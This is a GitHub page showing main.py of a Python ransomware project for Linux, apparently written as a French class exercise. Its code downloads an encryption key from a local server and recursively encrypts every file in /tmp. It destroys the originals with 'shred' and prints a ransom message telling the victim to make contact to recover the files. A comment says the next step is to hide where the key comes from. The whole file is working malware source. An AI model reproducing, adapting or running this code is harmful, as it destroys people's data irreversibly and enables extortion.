Ransomware-Linux/main.py at main · GreyGooseMAN/Ransomware-Linux · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
import os
from os.path import expanduser
from cryptography.fernet import Fernet
import base64
import http.server
import requests
import threading

"""     A LIRE """
"""
Lancer le programme main.py qui chiffrera les fichiers de votre répertoire /tmp, taper :
    python3 server.py

Le fichier keyfile.txt que vous voyez est celui présent sur le serveur. Il n'est pas visible par la victime. On a tout regrouper
dans un même dossier pour faciliter le déroulement du TP.

Sur un autre terminal 2, taper :
    python3 main.py
Pour déchiffrer, taper sur terminal 2 :
L'objectif étant par la suite de ne pas pouvoir retrouver l'adresse d'ou provient la clé et le moyen de la récupérer évidemment...
    python3 main.py --action decrypt --keyfile keyfile.txt keyfile

"""
"""     A LIRE """


class Ransomware:

    def __init__(self, key=None):
        """
        Initialisation de la classe Ransomware
        On utilise la même clé AES 128 pour chiffrer et déchiffrer

        Tous les fichiers, à savoir ceux qui sont nommés de la forme *.* sont concernés par le chiffrement.
        """

        self.key = key
        self.cryptor = None
        self.file_ext_targets = ["*"]


    def read_key(self, key):
        """
        Lis la clé dans le fichier keyfile_name
        """
        self.cryptor = Fernet(key)


    def write_key(self, keyfile_name):
        """
        Ecrit la clé téléchargée dans le fichier keyfile_name
        """
        print(self.key)
        with open(keyfile_name, 'wb') as f:
            f.write(self.key)


    def crypt_tmp(self, tmp_dir, encrypted=False):
        """
            Chiffre de manière récursive les fichiers qu'on a récupéré

        """


        path ="/tmp"

        filelist = [] # On liste les chemins absolus de nos fichiers

        for root, dirs, files in os.walk(path):
            for file in files:
                filelist.append(os.path.join(root,file)) #ajoute le chemin absolu à la liste filelist []

        for name in filelist:
            self.crypt_file(name, encrypted=encrypted) # chiffre tous les fichiers listés dans filelist []


    def crypt_file(self, file_path, encrypted=False):
        """
        Ecrit le nouveau fichier chiffré dans la forme xxxx.enc
        Sinon déchiffre le fichier xxxx.enc et l'écrit dans xxxx en enlevant .enc
        """
        try:
            if not encrypted:

                f = open(file_path, 'rb+')
                _data = f.read()
                data = self.cryptor.encrypt(_data)
                f_enc = open(file_path + ".enc", 'wb')
                f_enc.write(data)
                os.system("shred -v -z -u "+ file_path + " >/dev/null 2>&1")
            else:

                f = open(file_path, 'rb+')

                _data = f.read()
                data = self.cryptor.decrypt(_data)
                f_dec = open(file_path.replace(".enc",""), 'wb')
                f_dec.write(data)
                os.system("shred -v -z -u " + file_path +" >/dev/null 2>&1") # redirige les erreurs de la sortie std dans la corbeille
        except OSError:
            print("")


"""
    MAIN
"""

if __name__ == '__main__':

    local_tmp = '/tmp' # emplacement du dossier à chiffrer

    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument('--action') #1er type d'argument pour déchiffrer avec --action decrypt
    parser.add_argument('--keyfile') #2ème type d'argument, pour placer la clé de déchiffrement avec --keyfile nom_de_la_clé
    args = parser.parse_args()
    action = args.action
    keyfile = args.keyfile
    rware = Ransomware()
    url = 'http://127.0.0.1:8080/keyfile.txt' # adresse de la clé sur le serveur hébergé en local
    keyfile = requests.get(url) # récupère la clé
    keyfile = keyfile.text
    if action == 'decrypt':
        if keyfile is None:
            print('Veuillez spécifier le fichier de clé avec --keyfile')
        else:
            rware.read_key(keyfile)

            rware.crypt_tmp(local_tmp, encrypted=True)
    else: # si je ne déchiffre pas, je chiffre

        print("Vous avez été sujet à un ransomware, veuillez nous contacter pour espérer retrouver vos fichiers dans /tmp. \n NE RELANCEZ PAS LE main.py SINON VOS FICHIERS SERONT PERDUS.")
        rware.read_key(keyfile)
        rware.crypt_tmp(local_tmp) #lancement du chiffrement